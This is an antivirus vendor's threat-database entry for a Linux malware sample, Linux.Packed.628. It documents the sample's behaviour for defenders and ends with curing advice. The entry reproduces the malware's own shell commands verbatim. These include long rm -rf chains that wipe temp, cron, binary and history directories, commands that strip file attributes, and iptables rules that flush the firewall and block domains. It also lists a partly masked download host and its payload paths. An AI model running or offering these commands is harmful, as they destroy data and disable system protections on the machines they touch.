Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Packed.628

Added to the Dr.Web virus database: 2019-10-06

Virus description added:

Technical Information

Malicious functions:
Launches itself as a daemon
Substitutes application name for:
  • -1
  • tomffe
  • 69
  • dfvd
  • * **
Modifies firewall settings:
  • iptables -F
  • iptables -I INPUT -s 45.141.84.0/22 -j DROP
  • iptables -A FORWARD -p tcp --dport 53 -m string --algo kmp --string systemten.org -j DROP
  • iptables -A FORWARD -p tcp --dport 53 -m string --algo kmp --string lsd.systemten.org -j DROP
Launches processes:
  • sh -c crontab -r ; rm -rf /tmp/.* ; rm -rf /tmp/* ; crontab -r ; for i in `atq | awk '{print $1}'`; do atrm $i; done ; chattr -R -i /tmp/* ; rm -rf /tmp/.* ; rm -rf /dev/shm/* ; rm -rf /dev/shm/* ; rm -rf /var/tmp/* ; rm -rf /var/tmp/.* ; chattr -R -i /var/spool/*/* ; rm -rf /var/spool/*/*/* ; rm -rf /var/spool/cro*/cront*/* ; rm -rf /home/*/.ba* ; >/dev/null 2>&1
  • crontab -r
  • sh -c crontab -r ; rm -rf /usr/local/bin/* ; rm -rf /usr/local/sbin/* ; chattr -ia /usr/local/bin/.cach* ; rm -rf /usr/local/bin/.ca* ; chattr -ia /usr/local/bin/.* ; rm -rf /usr/local/bin/.* ; rm -rf /usr/sbin/crond ; chmod 000 /usr/bin/py* ; rm -rf /home/*/.ss*/.kn* ; rm -rf /root/.ss*/.kn* ; rm -rf /var/spool/cr*/* ; rm -rf /etc/cron.*/* ; rm -rf /var/spool/anacro*/*/* ; rm -rf /root/.ba* ; rm -rf /lib64/liblzma* ; rm -rf /lib64/libaio* ; rm -rf /usr/sbin/rpcio* ; rm -rf /usr/sbin/config.* ; rm -rf /usr/local/bin*/* ; >/dev/null 2>&1
  • sh -c iptables -F ; iptables-save ; >/dev/null 2>&1
  • sh -c iptables -I INPUT -s 45.141.84.0/22 -j DROP ; iptables -A FORWARD -p tcp --dport 53 -m string --algo kmp --string 'systemten.org' -j DROP ; iptables -A FORWARD -p tcp --dport 53 -m string --algo kmp --string 'lsd.systemten.org' -j DROP ; iptables -A FORWARD -p tcp --dport 53 -m string --algo kmp --string 'tor2web.su' -j DROP ; iptables -A FORWARD -p udp --dport 53 -m string --algo kmp --string 'tor2web.io' -j DROP ; iptables -A FORWARD -p udp --dport 53 -m string --algo kmp --string 'onion.sh' -j DROP ; iptables -I OUTPUT -p tcp -d pastebin.com -j DROP ; iptables -A INPUT -p tcp -s pastebin.com -j DROP ; iptables -A INPUT -p tcp --dport 443 -j DROP ; iptables -A OUTPUT -p tcp --dport 8080 -j DROP ; iptables -A OUTPUT -p tcp --dport 443 -j DROP ; iptables-save ; >/dev/null 2>&1
  • rm -rf /usr/local/bin/*
  • rm -rf /usr/local/sbin/*
  • chattr -ia /usr/local/bin/.cach*
  • rm -rf /usr/local/bin/.ca*
  • sh -c /root/sirnhh
  • /root/sirnhh
  • sh -c rm -rf /tmp/.* ; rm -rf /tmp/* ; for i in `atq | awk '{print $1}'`; do atrm $i; done ; chattr -R -i /tmp/* ; rm -rf /tmp/.* ; rm -rf /dev/shm/* ; rm -rf /dev/shm/* ; rm -rf /etc/rc.d/init.d/kworker* ; rm -rf /var/tmp/* ; rm -rf /var/tmp/.* ; chattr -R -i /var/spool/*/* ; rm -rf /var/spool/*/*/* ; >/dev/null 2>&1
  • rm -rf /tmp/. /tmp/.. /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix
  • sh -c /root/fhwxok escf
  • /root/fhwxok escf
  • sh -c /root/nhfd
  • /root/nhfd
Kills system processes:
  • sshd
Kills the following processes:
  • run.sh
  • bash
  • systemd
  • <SAMPLE>
  • /bin/sh
  • cron
  • /sbin/iptables
  • /bin/rm
  • (sd-pam)
  • /root/fhwxok
  • /root/nhfd
Performs operations with the file system:
Modifies file access rights:
  • /usr/bin/wget
  • /dev/urandom
  • /usr/bin/perl
  • /usr/bin/python3.4
  • /usr/bin/python2.7
  • /usr/bin/mawk
  • /usr/bin/xargs
  • /bin/sed
  • /usr/bin/crontab
  • /root/sirnhh
  • /etc/ld.so.cache
  • /usr/local/bin
  • /var/spool/cron
  • /root/fhwxok
  • /root/nhfd
Deletes folders:
  • /usr/local/sbin/
  • /var/spool/cron/atjobs
  • /var/spool/cron/atspool
  • /usr/local/bin/
  • /var/spool/cron/crontabs
  • /var/spool/cron/
Creates or modifies files:
  • /root/sirnhh
  • /root/fhwxok
  • /root/c
  • /root/nhfd
Deletes files:
  • /usr/local/bin/*
  • /usr/local/sbin/*
  • /usr/local/bin/.ca*
  • /usr/bin/perl
  • /etc/ld.so.cache
  • /root/fhwxok
  • /root/c
Network activity:
Establishes connection:
  • 14#.#8.34.25:80
HTTP GET requests:
  • 14#.##.34.25/c/cf
  • 14#.##.34.25/c/cdc
  • 14#.##.34.25/c/coooc

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number